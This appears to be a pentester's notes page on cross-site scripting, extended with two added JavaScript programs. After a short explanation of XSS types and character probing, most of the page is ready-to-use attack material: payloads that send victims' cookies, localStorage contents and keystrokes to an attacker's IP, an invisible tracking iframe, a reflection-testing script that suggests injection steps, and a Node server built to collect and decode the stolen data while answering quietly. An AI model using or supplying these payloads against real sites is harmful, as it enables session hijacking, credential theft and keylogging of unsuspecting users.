Cross-Site Scripting (XSS)

Notes

There are 4 types, combining where the payload is stored with where it is rendered (OWASP's classification): Server XSS means the server embeds the untrusted data in the HTML response; Client XSS means client-side JavaScript writes it into the DOM (DOM-based). Each of these can be Stored (persisted on the server, e.g. in a comment or profile field) or Reflected (returned straight from the current request):

  • Stored Client XSS
  • Reflected Client XSS
  • Stored Server XSS
  • Reflected Server XSS

Attack Vector

  1. Identifying XSS Vulnerabilities. Most common special characters to probe with:
< > - used to denote HTML elements
' " - string delimiters (also attribute values)
{ } - JavaScript code blocks and object literals
;   - end of statement
  2. Basic XSS. Check whether any submission form accepts the characters above and whether they come back escaped (e.g. < as &lt;). If they are reflected unescaped, we can insert tags: <script></script>
  3. Content Injection. We can inject an iframe like so (the 0x0 size keeps it invisible to the victim):
<iframe src="http://<your-ip>/report" height="0" width="0"></iframe>

And start listening on port 80 to receive that request (with some useful client data, like User-Agent):

sudo nc -nvlp 80
  4. Stealing Cookies and Session Information. If we inject this script, it sends the victim's cookies to your IP as the query string of an image request. Only cookies set without the HttpOnly flag are visible to document.cookie, so a missing session cookie in the capture usually means that flag is set:
<script>new Image().src="http://<your-ip>/cool.jpg?output="+document.cookie;</script>
  5. Payload from an external resource. You can serve a JS file from your own machine and include it like this, which keeps the injected string short and lets you change the payload without re-injecting:
<script src="http://<your-ip>/xss.js"></script>
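Steps 1 and 2 (probe with the special characters, then check whether they came back escaped) can be automated against the response body. The following is an added example written for these notes, not code from the original page: it wraps the probe characters in a unique canary so our own input can be located in the response, strips HTML entities before looking for raw characters (otherwise the ';' that terminates &lt; would be mistaken for our semicolon), and reports which characters survived. The canary value, the function names and the three sample responses are constructed for the demonstration and stand in for three differently behaving servers.

```javascript
// Added example, not from the original notes. Automates the "submit the special
// characters and see whether they are escaped" check from steps 1 and 2.
// The canary, function names and sample responses are all constructed here.

const PROBE_CHARS = ['<', '>', '"', "'", '{', '}', ';'];

// Probe value to put into the form field, e.g. zq9x<>"'{};zq9x. The canary on
// both sides lets us find exactly our input inside a large response.
function buildProbe(canary) {
  return canary + PROBE_CHARS.join('') + canary;
}

// Given the canary and the HTML that came back, report which probe characters
// were reflected raw and which were neutralized (entity-encoded or stripped).
function analyzeReflection(canary, responseHtml) {
  const start = responseHtml.indexOf(canary);
  if (start === -1) {
    return { reflected: false, truncated: false, unescaped: [], neutralized: PROBE_CHARS.slice() };
  }
  const end = responseHtml.indexOf(canary, start + canary.length);
  if (end === -1) {
    // Second canary missing: the value was cut or filtered in the middle, so we
    // cannot tell where our input ends and must not guess from the rest of the page.
    return { reflected: true, truncated: true, unescaped: [], neutralized: PROBE_CHARS.slice() };
  }
  const between = responseHtml.slice(start + canary.length, end);
  // Drop HTML entities (&lt; &#39; &#x27; ...) first: their trailing ';' must not
  // be mistaken for the raw semicolon we sent.
  const withoutEntities = between.replace(/&(?:#\d+|#x[0-9a-f]+|[a-z]+);/gi, '');
  const unescaped = PROBE_CHARS.filter((c) => withoutEntities.includes(c));
  const neutralized = PROBE_CHARS.filter((c) => !withoutEntities.includes(c));
  return { reflected: true, truncated: false, unescaped, neutralized };
}

// Rough guidance on what the surviving characters allow.
function suggestNextStep(result) {
  if (!result.reflected) return 'not reflected in this response';
  if (result.truncated) return 'reflected but truncated: try a shorter probe';
  const has = (c) => result.unescaped.includes(c);
  if (has('<') && has('>')) return 'tag injection: try <script></script>';
  if (has('"') || has("'")) return 'attribute breakout: close the quote and add an event handler';
  return 'angle brackets and quotes neutralized: try another injection point';
}

// Constructed responses standing in for three different servers.
const CANARY = 'zq9x';
const PROBE = buildProbe(CANARY);
const SAMPLE_RESPONSES = {
  // Encodes < > " ' : safe in a text context, only { } ; come back raw
  escaped: '<p>You searched for: zq9x&lt;&gt;&quot;&#39;{};zq9x</p>',
  // Reflects everything raw: script tags are possible
  raw: '<p>You searched for: ' + PROBE + '</p>',
  // Encodes angle brackets only: the quotes still break out of the attribute
  attribute: '<input value="zq9x&lt;&gt;"\'{};zq9x">',
};

for (const [name, html] of Object.entries(SAMPLE_RESPONSES)) {
  const result = analyzeReflection(CANARY, html);
  console.log(name.padEnd(10), 'raw:', result.unescaped.join(''), '->', suggestNextStep(result));
}
```

In practice you would fetch the page with the probe in each parameter and feed the body to analyzeReflection; the analyzer only tells you which characters survived, the injection context (text node, attribute, script block) still has to be read from the surrounding HTML.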

Examples of remote JS payloads files

Cookies

let cookie = document.cookie
let encodedCookie = encodeURIComponent(cookie)
fetch("http://<your-ip>/exfil?cookies=" + encodedCookie)

Secrets

let data = JSON.stringify(localStorage)
let encodedData = encodeURIComponent(data)
fetch("http://<your-ip>/exfil?secrets=" + encodedData)

KeyLogger

function logKey(event){
        // the scheme is required: a bare "<your-ip>/k" is a relative URL and would be sent to the victim's site
        // encode the key, otherwise values such as "#", "&" or " " break the query string
        fetch("http://<your-ip>/k?key=" + encodeURIComponent(event.key))
}

document.addEventListener('keydown', logKey);

Other

navigator.userAgent // this contains information about the user agent: https://developer.mozilla.org/en-US/docs/Web/API/Navigator/userAgent
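The payloads above all deliver their data as a percent-encoded query string, and nc -nvlp 80 shows that string raw, handles a single connection and never answers the victim's browser. The following receiver is an added example written for these notes (not from the original page): it percent-decodes the parameters, turns the localStorage JSON back into an object, records the User-Agent and remote address from the request, replies 204 so the victim's page sees nothing unusual, and keeps serving. The parsing step is kept separate from the socket so it can be exercised offline; the function names, the EXFIL_PORT environment variable and the sample request are assumptions of this example.

```javascript
// Added example, not from the original notes: a receiver for the cookie,
// localStorage and keylogger payloads above. Function names, the EXFIL_PORT
// variable and the sample request below are constructed for this demonstration.

// Pure parsing step: `rawUrl` is the request path as Node reports it
// (e.g. "/exfil?cookies=PHPSESSID%3Dabc"), `headers` the lowercased header object.
function parseExfilRequest(rawUrl, headers) {
  // The base is only needed so a relative path parses; it is never contacted.
  const url = new URL(rawUrl, 'http://placeholder.invalid');
  const params = {};
  for (const [key, value] of url.searchParams) {
    params[key] = value; // URLSearchParams already reverses encodeURIComponent
  }
  // The "secrets" payload sends JSON.stringify(localStorage); give back the object.
  if (typeof params.secrets === 'string') {
    try {
      params.secrets = JSON.parse(params.secrets);
    } catch (_) {
      // not JSON after all, keep the raw string
    }
  }
  return {
    path: url.pathname,
    params,
    userAgent: headers['user-agent'] || '',
  };
}

// Opens the listener. `onHit` receives one decoded record per request.
function createExfilServer(port, onHit = (hit) => console.log(JSON.stringify(hit))) {
  // Required lazily so parseExfilRequest can be used without opening a socket.
  const http = require('node:http');
  const server = http.createServer((req, res) => {
    const hit = parseExfilRequest(req.url, req.headers);
    hit.remote = req.socket.remoteAddress;
    hit.time = new Date().toISOString();
    onHit(hit);
    // 204 with no body: the Image()/fetch in the victim's page completes quietly.
    res.writeHead(204);
    res.end();
  });
  server.listen(port);
  return server;
}

// Constructed sample of what the cookie payload sends.
const SAMPLE_COOKIE_HIT = parseExfilRequest(
  '/exfil?cookies=' + encodeURIComponent('PHPSESSID=abc123; theme=dark'),
  { 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) Firefox/118.0' }
);

if (process.env.EXFIL_PORT) {
  // e.g.  EXFIL_PORT=80 sudo node exfil.js
  createExfilServer(Number(process.env.EXFIL_PORT));
} else {
  console.log(JSON.stringify(SAMPLE_COOKIE_HIT, null, 2));
}
```

Because Image() and a default fetch() are simple cross-origin requests, no CORS headers are needed for the data to arrive; the browser only withholds the response from the page, which the payload never reads anyway.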